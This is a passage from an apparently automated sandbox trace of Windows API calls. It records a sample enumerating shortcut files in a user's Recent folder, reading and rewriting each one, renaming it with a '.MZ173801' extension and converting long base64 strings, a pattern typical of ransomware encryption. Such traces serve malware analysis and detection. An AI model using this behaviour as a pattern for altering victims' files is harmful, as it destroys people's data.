dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.746] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x52a, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x52a, lpOverlapped=0x0) returned 1 [0111.747] CloseHandle (hObject=0x3f4) returned 1 [0111.747] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TrIgUDcr5i55m8wcE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\trigudcr5i55m8wce.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.748] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x52a, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x52a, lpOverlapped=0x0) returned 1 [0111.750] CloseHandle (hObject=0x3f4) returned 1 [0111.750] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TrIgUDcr5i55m8wcE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\trigudcr5i55m8wce.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TrIgUDcr5i55m8wcE.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\trigudcr5i55m8wce.lnk.mz173801")) returned 1 [0111.751] GetCurrentThreadId () returned 0x1358 [0111.751] GetCurrentThreadId () returned 0x1358 [0111.751] GetCurrentThreadId () returned 0x1358 [0111.751] GetCurrentThreadId () returned 0x1358 [0111.751] GetCurrentThreadId () returned 0x1358 [0111.751] GetCurrentThreadId () returned 0x1358 [0111.751] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9ae4846, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9ae4846, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe9ae4846, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x427, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="twHBtCvhRR2G5.lnk", cAlternateFileName="TWHBTC~1.LNK")) returned 1 [0111.751] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.751] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.751] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\twHBtCvhRR2G5.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\twhbtcvhrr2g5.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9ae4846, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9ae4846, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe9ae4846, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x427)) returned 1 [0111.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.752] GetCurrentThreadId () returned 0x1358 [0111.752] GetCurrentThreadId () returned 0x1358 [0111.752] GetCurrentThreadId () returned 0x1358 [0111.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.753] GetCurrentThreadId () returned 0x1358 [0111.753] GetCurrentThreadId () returned 0x1358 [0111.753] GetCurrentThreadId () returned 0x1358 [0111.753] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\twHBtCvhRR2G5.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\twhbtcvhrr2g5.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.753] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.753] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.753] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x427 [0111.753] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.753] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x427, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x427, lpOverlapped=0x0) returned 1 [0111.754] CloseHandle (hObject=0x3f4) returned 1 [0111.754] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\twHBtCvhRR2G5.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\twhbtcvhrr2g5.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.755] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x427, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x427, lpOverlapped=0x0) returned 1 [0111.756] CloseHandle (hObject=0x3f4) returned 1 [0111.757] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\twHBtCvhRR2G5.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\twhbtcvhrr2g5.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\twHBtCvhRR2G5.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\twhbtcvhrr2g5.lnk.mz173801")) returned 1 [0111.758] GetCurrentThreadId () returned 0x1358 [0111.758] GetCurrentThreadId () returned 0x1358 [0111.758] GetCurrentThreadId () returned 0x1358 [0111.758] GetCurrentThreadId () returned 0x1358 [0111.758] GetCurrentThreadId () returned 0x1358 [0111.758] GetCurrentThreadId () returned 0x1358 [0111.758] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7db28253, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7db28253, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7db28253, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x28d, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="txD8odKDry6.lnk", cAlternateFileName="TXD8OD~1.LNK")) returned 1 [0111.758] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.758] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.758] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\txD8odKDry6.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\txd8odkdry6.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7db28253, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7db28253, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7db28253, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x28d)) returned 1 [0111.758] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.758] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.759] GetCurrentThreadId () returned 0x1358 [0111.759] GetCurrentThreadId () returned 0x1358 [0111.759] GetCurrentThreadId () returned 0x1358 [0111.759] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.759] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 